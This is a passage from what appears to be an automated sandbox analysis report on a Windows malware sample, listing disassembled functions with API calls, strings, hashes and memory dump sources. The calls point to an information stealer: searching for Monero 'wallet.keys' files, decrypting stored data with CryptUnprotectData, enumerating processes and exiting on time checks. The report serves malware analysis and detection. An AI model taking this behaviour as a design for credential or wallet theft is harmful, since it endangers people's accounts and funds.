                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: a3fc92fe6d9e9c2a8f63bd52176eaaebfe5addac31101d08988eaf63e57530fe
                            • Instruction ID: bec6ce700b0b6cbb0092367aae44d4444c5eab0af6ce587dbfa2b55874db0122
                            • Opcode Fuzzy Hash: a3fc92fe6d9e9c2a8f63bd52176eaaebfe5addac31101d08988eaf63e57530fe
                            • Instruction Fuzzy Hash: 48414D7194011CABDB24DB54EC99FEEBB78FF88700F208199E50962181DB342F85DFA2
                            Function 0056E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00580D73), ref: 0056E4A2
                            • StrCmpCA.SHLWAPI(?,005814F8), ref: 0056E4F2
                            • StrCmpCA.SHLWAPI(?,005814FC), ref: 0056E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 6914498daf46f3a84d547d4406b1f6566f89f2efbc0262b1ab01282b60ccc35e
                            • Instruction ID: 6d6a79f10641a22317b5de98e13c0b587b4c445c3a8071e28b750855890d4c4c
                            • Opcode Fuzzy Hash: 6914498daf46f3a84d547d4406b1f6566f89f2efbc0262b1ab01282b60ccc35e
                            • Instruction Fuzzy Hash: EA1220719101159ADB18FB70EC9AEEE7B38BBD4300F4085A8B51E96091EF346F49DF92
                            Function 00939CB6 Relevance: 9.1, Strings: 6, Instructions: 1580COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :[qu$F82$m\w^$K^$M~k$iv
                            • API String ID: 0-1727420772
                            • Opcode ID: 72ad8e7146df4e6bc25f30ec303ae0a8ef35dbfd76b0b5972459937bc50950ec
                            • Instruction ID: e556bd88a482066414feeb586de8052a9c98c1a6c6ace71ce84355bd7a2fa8a5
                            • Opcode Fuzzy Hash: 72ad8e7146df4e6bc25f30ec303ae0a8ef35dbfd76b0b5972459937bc50950ec
                            • Instruction Fuzzy Hash: AFB216F360C2049FE3046E2DEC8567ABBE5EF94720F1A4A3DEAC483744EA3558058797
                            Function 00569AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00564EEE,00000000,?), ref: 00569B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569B2A
                            • LocalFree.KERNEL32(?,?,?,?,00564EEE,00000000,?), ref: 00569B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: NV
                            • API String ID: 4291131564-146997974
                            • Opcode ID: 7566ed6847a441baf0317ccab22c645c7cd1ad13ce1c7943b80152b266261d22
                            • Instruction ID: e070f6fa499f45282c231d2aa1195fd294ecbd1e1dbd02df5479c2b9741220fa
                            • Opcode Fuzzy Hash: 7566ed6847a441baf0317ccab22c645c7cd1ad13ce1c7943b80152b266261d22
                            • Instruction Fuzzy Hash: 8B11D2B4640208BFEB01CF64CC95FAA77B9FB89B10F208158F9159B390C7B6A901CB94
                            Function 00934D1E Relevance: 7.9, Strings: 5, Instructions: 1621COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: )R5$[|w$$_Gez$gwn$zY^{
                            • API String ID: 0-383978469
                            • Opcode ID: 7fdfe75f4d30ce9011ff1ff799163302a9701e204fab0dbcf9151054e67f0e00
                            • Instruction ID: 28bd9d3858df868a86ead79d34bad2018685b592a019e9a30b077ebe293204dd
                            • Opcode Fuzzy Hash: 7fdfe75f4d30ce9011ff1ff799163302a9701e204fab0dbcf9151054e67f0e00
                            • Instruction Fuzzy Hash: 1EB2E5F360C2009FE7046E2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3598058697
                            Function 0056C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0056C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0056C87C
                            • lstrcat.KERNEL32(?,00580B46), ref: 0056C943
                            • lstrcat.KERNEL32(?,00580B47), ref: 0056C957
                            • lstrcat.KERNEL32(?,00580B4E), ref: 0056C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 5b075f68556bd1e51ee773588e37737dc93aca8787815123d85b6b5a512d0bbe
                            • Instruction ID: 8942bdd1acace5662d4c365a8148298efac124c35fd281c8868f12cc21c4581c
                            • Opcode Fuzzy Hash: 5b075f68556bd1e51ee773588e37737dc93aca8787815123d85b6b5a512d0bbe
                            • Instruction Fuzzy Hash: 6C41827490421AEFDB50DF90DD89BFEBBB8BB88304F1045A8F509A7280D7746A84CF91
                            Function 00576920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0057696C
                            • sscanf.NTDLL ref: 00576999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005769B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005769C0
                            • ExitProcess.KERNEL32 ref: 005769DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: bb4e46c9b31612464e7c6bfe259937dc6b0b495630f37b4546171a75fe7f828c
                            • Instruction ID: 9de0fff9fb009bc98f8521f55ba54004b31e3e03abc55e2fa1c042dd713e2766
                            • Opcode Fuzzy Hash: bb4e46c9b31612464e7c6bfe259937dc6b0b495630f37b4546171a75fe7f828c
                            • Instruction Fuzzy Hash: DA21FF75D00209ABCF44EFE4E9459EEBBB5FF88300F04852EE51AE3250EB345604CB69
                            Function 00567240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0056724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00567254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00567281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005672A4
                            • LocalFree.KERNEL32(?), ref: 005672AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 0a44d2c41928f5994806334c88d453cfa892e79587af3cb964650295911693c2
                            • Instruction ID: 559d8098c2b4a79f43d77108c0926137ddc062bd7990af8d775aa0e575f562c9
                            • Opcode Fuzzy Hash: 0a44d2c41928f5994806334c88d453cfa892e79587af3cb964650295911693c2
                            • Instruction Fuzzy Hash: C00100B5A40208BBDB10DFD4CD45F9E77B8BB44B04F108554FB05AB2C0D774AA00CB69
                            Function 00579600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0057961E
                            • Process32First.KERNEL32(00580ACA,00000128), ref: 00579632
                            • Process32Next.KERNEL32(00580ACA,00000128), ref: 00579647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0057965C
                            • CloseHandle.KERNEL32(00580ACA), ref: 0057967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: f98d8466142977668b01265977cef2d83ead960661ebd3eb631293670d0bd49e
                            • Instruction ID: 5f7fe8c5571b00cdc0fc1b2cf7d3f605b916c47ff800cddd83fbe83256b2cff9
                            • Opcode Fuzzy Hash: f98d8466142977668b01265977cef2d83ead960661ebd3eb631293670d0bd49e
                            • Instruction Fuzzy Hash: 13010C75A00208BFCB15DFA5DD48BEEBBF8FB48300F108298A90A97240D7389B44DF61
                            Function 00578EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00565184,40000001,00000000,00000000,?,00565184), ref: 00578EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 926a11fc933e8748a1cdfffd1c28b14aef9c19b184bf351a857b61575d8ab986
                            • Instruction ID: 67f9bf773144573dbb559c099e9aaca7c6704206c5a604ac828a586184f9a581
                            • Opcode Fuzzy Hash: 926a11fc933e8748a1cdfffd1c28b14aef9c19b184bf351a857b61575d8ab986
                            • Instruction Fuzzy Hash: 0A110A70240205BFDB00CF64E888FBA3BA9BF89710F10D448FD198B250DB35E841EB64
                            Function 00577A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E4E008,00000000,?,00580E10,00000000,?,00000000,00000000), ref: 00577A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00577A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E4E008,00000000,?,00580E10,00000000,?,00000000,00000000,?), ref: 00577A7D
                            • wsprintfA.USER32 ref: 00577AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 263e863d066bd9bbb691598beb713b4bc84ed96bfa365fc301d3ce72e018fde7
                            • Instruction ID: 98153bbd68089ff71a04c9a0fbc84fdaacc933341a11c99971d1b94977aa62c1
                            • Opcode Fuzzy Hash: 263e863d066bd9bbb691598beb713b4bc84ed96bfa365fc301d3ce72e018fde7
                            • Instruction Fuzzy Hash: 0D1182B1945218EBEB208F54EC49F69BB78FB45711F1087D5E90AA32C0C7785E40CF51
                            Function 00938B46 Relevance: 5.8, Strings: 4, Instructions: 838COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
